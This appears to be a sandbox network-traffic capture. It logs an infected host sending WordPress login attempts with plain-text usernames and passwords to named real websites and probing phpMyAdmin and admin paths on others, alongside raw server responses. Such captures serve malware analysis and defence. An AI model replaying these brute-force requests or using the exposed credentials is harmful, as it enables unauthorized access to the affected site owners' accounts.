2024-02-20 23:26:24 UTC	1455	IN	Data Raw: 35 61 38 0d 0a 6e 3a 68 6f 76 65 72 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 20 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 20 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 23 73 75 62 6d 69 74 3a 68 6f 76 65 72 2c 69 6e 70 75 74 23 73 75 62 6d 69 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 Data Ascii: 5a8n:hover,.ast-button:hover,.ast-custom-button:hover .button:hover,.ast-custom-button:hover ,input[type=reset]:hover,input[type=reset]:focus,input#submit:hover,input#submit:focus,input[type="button"]:hover,input[type="button"]:focus,input[type="submit"
2024-02-20 23:26:24 UTC	8192	IN	Data Raw: 31 64 36 0d 0a 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 34 34 70 78 29 7b 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 73 69 6e 67 6c 65 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 74 69 74 6c 65 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 63 68 69 76 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 20 31 65 6d 3b 7d 2e 61 73 74 2d 73 65 70 61 72 61 74 Data Ascii: 1d6r{max-width:100%;}}@media (max-width:544px){.ast-separate-container .ast-article-post,.ast-separate-container .ast-article-single,.ast-separate-container .comments-title,.ast-separate-container .ast-archive-description{padding:1.5em 1em;}.ast-separat
2024-02-20 23:26:24 UTC	483	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 35 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 61 73 74 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 29 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 2e 72 65 61 64 2d 6d 6f 72 65 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 2e 35 65 6d 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6e 6f 2d 62 75 74 74 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 20 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 2e 77 Data Ascii: -color-5);border-color: var(--ast-border-color);}.wp-block-latest-posts .read-more {margin-bottom: 1.5em;}.wp-block-search__no-button .wp-block-search__inside-wrapper .wp-block-search__input {padding-top: 5px;padding-bottom: 5px;}.wp-block-latest-posts .w
2024-02-20 23:26:24 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:24 UTC	7258	IN	Data Raw: 31 63 35 32 0d 0a 61 67 65 2d 62 75 69 6c 64 65 72 2d 74 65 6d 70 6c 61 74 65 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 3e 20 2a 2c 2e 61 73 74 2d 70 61 67 65 2d 62 75 69 6c 64 65 72 2d 74 65 6d 70 6c 61 74 65 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 3e 20 2e 61 6c 69 67 6e 66 75 6c 6c 20 3e 20 2a 20 7b 6d 61 78 2d 77 69 64 74 68 3a 20 6e 6f 6e 65 3b 7d 2e 61 73 74 2d 70 61 67 65 2d 62 75 69 6c 64 65 72 2d 74 65 6d 70 6c 61 74 65 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 3e 20 2e 61 6c 69 67 6e 77 69 64 65 20 3e 20 2a 20 7b 6d 61 78 2d 77 69 64 74 68 3a 20 76 61 72 28 Data Ascii: 1c52age-builder-template .entry-content[ast-blocks-layout] > ,.ast-page-builder-template .entry-content[ast-blocks-layout] > .alignfull > {max-width: none;}.ast-page-builder-template .entry-content[ast-blocks-layout] > .alignwide > * {max-width: var(

Session ID	Source IP	Source Port	Destination IP	Destination Port
307	192.168.2.6	58708	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:22 UTC	354	OUT	POST /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP+Cookie+check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://norwegischlernen.info/wp-login.php Content-Length: 144 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:22 UTC	144	OUT	Data Raw: 6c 6f 67 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 70 77 64 3d 46 75 63 6b 6d 79 6c 69 66 65 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=administrator&pwd=Fuckmylife1&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fnorwegischlernen.info%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:23 UTC	408	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5774 date: Tue, 20 Feb 2024 23:26:23 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:23 UTC	5774	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; norwegischlernen.info — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noa

Session ID	Source IP	Source Port	Destination IP	Destination Port
308	192.168.2.6	58795	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	177	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:23 UTC	226	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://www.stylesense.co.uk/PhpMyAdmin/
2024-02-20 23:26:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
309	192.168.2.6	59152	75.2.70.75	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	166	OUT	GET /admin HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:23 UTC	177	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:23 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/admin
2024-02-20 23:26:23 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
310	192.168.2.6	59224	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	303	OUT	POST /wp-login.php HTTP/1.1 Host: www.cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://cabinet-orsika.fr/wp-login.php Content-Length: 170 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:23 UTC	170	OUT	Data Raw: 6c 6f 67 3d 73 65 63 72 65 74 61 72 69 61 74 25 34 30 63 61 62 69 6e 65 74 2d 6f 72 73 69 6b 61 2e 66 72 26 70 77 64 3d 44 6f 66 6b 73 63 37 38 31 32 33 34 35 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 53 65 2b 63 6f 6e 6e 65 63 74 65 72 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 61 62 69 6e 65 74 2d 6f 72 73 69 6b 61 2e 66 72 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=secretariat%40cabinet-orsika.fr&pwd=Dofksc7812345&rememberme=forever&wp-submit=Se+connecter&redirect_to=https%3A%2F%2Fwww.cabinet-orsika.fr%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:24 UTC	424	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding X-Powered-By: PleskLin
2024-02-20 23:26:24 UTC	9086	IN	Data Raw: 31 65 37 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 53 65 20 63 6f 6e 6e 65 63 74 65 72 20 26 6c 73 61 71 75 6f 3b 20 44 72 20 44 6f 6e 20 50 69 65 72 72 65 20 4f 72 73 69 6e 69 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 Data Ascii: 1e71<!DOCTYPE html><html lang="fr-FR"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Se connecter &lsaquo; Dr Don Pierre Orsini — WordPress</title><meta name='robots' content='noindex, follow' /><link

Session ID	Source IP	Source Port	Destination IP	Destination Port
311	192.168.2.6	59336	15.161.71.77	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	176	OUT	GET /pma/ HTTP/1.1 Host: iisalessandrini.edu.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:23 UTC	436	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:23 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Location: https://iisalessandrini.edu.it/pma Content-Length: 242 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:23 UTC	242	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 69 73 61 6c 65 73 73 61 6e 64 72 69 6e 69 2e 65 64 75 2e 69 74 2f 70 6d 61 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://iisalessandrini.edu.it/pma">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
312	192.168.2.6	59368	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	178	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:24 UTC	408	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.cabinet-orsika.fr/PhpMyAdmin/ X-Cache-Status: MISS X-Powered-By: PleskLin

Session ID	Source IP	Source Port	Destination IP	Destination Port
313	192.168.2.6	59311	185.39.146.199	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:23 UTC	169	OUT	GET /pma/ HTTP/1.1 Host: www.markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:24 UTC	735	IN	HTTP/1.1 404 Not Found date: Tue, 20 Feb 2024 23:26:23 GMT expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: PHPSESSID=3i8mjl67b2cj4sd4akmpj22c12; expires=Fri, 10-Jun-2078 22:52:46 GMT; Max-Age=1713655583; path=/; secure; HttpOnly; SameSite=None access-control-allow-origin: * access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUT access-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, token content-type: text/html; charset=iso-8859-1 x-backend: server2 x-type: customer x-varnish: 985656629 age: 0 transfer-encoding: chunked x-server: varnish-1 connection: close
2024-02-20 23:26:24 UTC	12536	IN	Data Raw: 33 30 46 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6f 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 20 4d 61 72 6b f8 72 65 6e 20 52 65 6b 6c 61 6d 65 20 41 53 20 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: 30F0<!DOCTYPE html><html lang="no"><head><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title> Markren Reklame AS </title><meta name
2024-02-20 23:26:24 UTC	2903	IN	Data Raw: 42 35 30 0d 0a 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 6b 6f 6e 74 61 6b 74 22 20 3e 4b 6f 6e 74 61 6b 74 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 0a 0a 0a 0a 09 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 76 69 73 69 62 6c 65 2d 78 73 22 3e 0a 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 6d 6f 64 61 6c 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 6c 6f 67 69 6e 4d 6f 64 61 6c 22 20 68 72 65 66 3d 22 23 22 3e 4c 6f 67 67 20 70 e5 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 0a 09 09 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 3c 2f 75 6c 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 2d 78 73 Data Ascii: B50><a href="/kontakt" >Kontakt</a></li><li class="visible-xs"><a data-toggle="modal" data-target="#loginModal" href="#">Logg p</a></li></ul></div><div class="hidden-xs
2024-02-20 23:26:24 UTC	7238	IN	Data Raw: 31 43 33 45 0d 0a 65 72 5f 63 6f 6c 6f 72 22 20 76 61 6c 75 65 3d 22 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 66 69 6c 74 65 72 5f 63 6f 6c 6f 72 5f 63 6c 61 73 73 22 20 76 61 6c 75 65 3d 22 63 6f 6c 73 65 6c 65 63 74 65 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 73 65 61 72 63 68 20 63 6f 6c 66 69 6c 74 65 72 5f 72 65 64 20 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 3b 22 20 6f 6e 63 6c 69 63 6b 3d 22 66 69 6c 74 65 72 73 2e 73 65 74 5f 63 6f 6c 6f 72 28 31 2c 74 68 69 73 29 3b 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 6c 79 70 68 69 63 6f 6e 20 67 6c 79 70 68 69 63 6f 6e 2d 6f 6b 22 3e 3c 2f 73 70 61 6e 3e a0 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 Data Ascii: 1C3Eer_color" value=""><input type="hidden" class="filter_color_class" value="colselected"><div class="colsearch colfilter_red " style="background:red;" onclick="filters.set_color(1,this);"><span class="glyphicon glyphicon-ok"></span></div><div cla
2024-02-20 23:26:24 UTC	16318	IN	Data Raw: 33 46 42 36 0d 0a 61 72 74 69 6b 6c 65 72 2f 6b 6f 70 70 65 72 2d 67 6c 61 73 73 22 3e 4b 6f 70 70 65 72 20 26 20 47 6c 61 73 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 70 72 6f 66 69 6c 61 72 74 69 6b 6c 65 72 2f 70 61 72 61 70 6c 79 65 72 22 3e 50 61 72 61 70 6c 79 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 70 72 6f 66 69 6c 61 72 74 69 6b 6c 65 72 2f 6d 6f 62 69 6c 65 2d 74 61 62 6c 65 74 22 3e 4d 6f 62 69 6c 65 20 26 20 54 61 62 6c 65 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 70 72 6f 66 69 6c 61 72 74 69 6b 6c 65 72 2f 6b 6c 6f 6b 6b 65 72 22 3e 4b 6c 6f Data Ascii: 3FB6artikler/kopper-glass">Kopper & Glass</a></li><li><a href="/sortiment/profilartikler/paraplyer">Paraplyer</a></li><li><a href="/sortiment/profilartikler/mobile-tablet">Mobile & Tablet</a></li><li><a href="/sortiment/profilartikler/klokker">Klo
2024-02-20 23:26:24 UTC	2511	IN	Data Raw: 39 43 38 0d 0a 09 09 3c 2f 75 6c 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 72 69 67 68 74 22 20 69 64 3d 22 6e 61 76 62 61 72 2d 73 65 63 6f 6e 64 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 69 73 69 62 6c 65 2d 78 73 22 3e 0a 09 09 09 09 09 3c 70 3e 3c 2f 70 3e 0a 09 09 09 09 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 61 70 69 2f 73 65 61 72 63 68 2f 70 72 65 70 61 72 65 2f 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 09 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 73 6f 65 6b 22 20 69 64 3d 22 73 72 63 68 78 76 2d 78 73 22 20 6e 61 6d 65 3d Data Ascii: 9C8</ul></div><div class="navbar-collapse collapse navbar-right" id="navbar-second"><div class="visible-xs"><p></p><form action="/api/search/prepare/" method="get"><input type="hidden" value="soek" id="srchxv-xs" name=
2024-02-20 23:26:24 UTC	1455	IN	Data Raw: 35 41 38 0d 0a 6c 2d 6c 65 66 74 22 20 6f 6e 63 6c 69 63 6b 3d 22 75 73 65 72 6c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 4e 65 77 48 69 64 65 28 29 3b 22 20 3e 54 69 6c 62 61 6b 65 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 64 6f 6e 65 77 70 61 73 73 77 6f 72 64 20 68 69 64 64 65 6e 20 62 74 6e 20 62 74 6e 2d 73 75 63 63 65 73 73 22 20 6f 6e 63 6c 69 63 6b 3d 22 75 73 65 72 6c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 4e 65 77 53 65 6e 64 28 27 6c 6f 67 69 6e 6d 6f 64 61 6c 5f 66 6f 72 6d 27 29 3b 22 20 3e 42 65 20 6f 6d 20 6e 79 74 74 20 70 61 73 73 6f 72 64 3c 2f 62 75 74 74 6f 6e 3e 0a 0a 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 Data Ascii: 5A8l-left" onclick="userlogin.passwordNewHide();" >Tilbake</button><button type="button" class="donewpassword hidden btn btn-success" onclick="userlogin.passwordNewSend('loginmodal_form');" >Be om nytt passord</button></div></div></div></di
2024-02-20 23:26:24 UTC	1455	IN	Data Raw: 35 41 38 0d 0a 6c 22 3e 48 61 6e 64 6c 65 6b 75 72 76 3c 2f 68 34 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 62 6f 64 79 22 3e 0a 3c 74 65 6d 70 6c 61 74 65 20 69 64 3d 22 74 65 6d 70 6c 61 74 65 5f 63 61 72 74 6c 69 73 74 5f 69 74 65 6d 73 22 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 34 20 63 6f 6c 2d 73 6d 2d 32 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 75 6e 70 72 2e 69 6f 2f 5f 67 66 78 2f 63 6c 65 61 72 64 6f 74 2e 67 69 66 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 36 20 63 6f 6c 2d 73 6d 2d 35 22 3e 3c 61 20 68 72 65 66 3d 22 7b 63 61 72 74 5f 69 74 65 6d Data Ascii: 5A8l">Handlekurv</h4></div><div 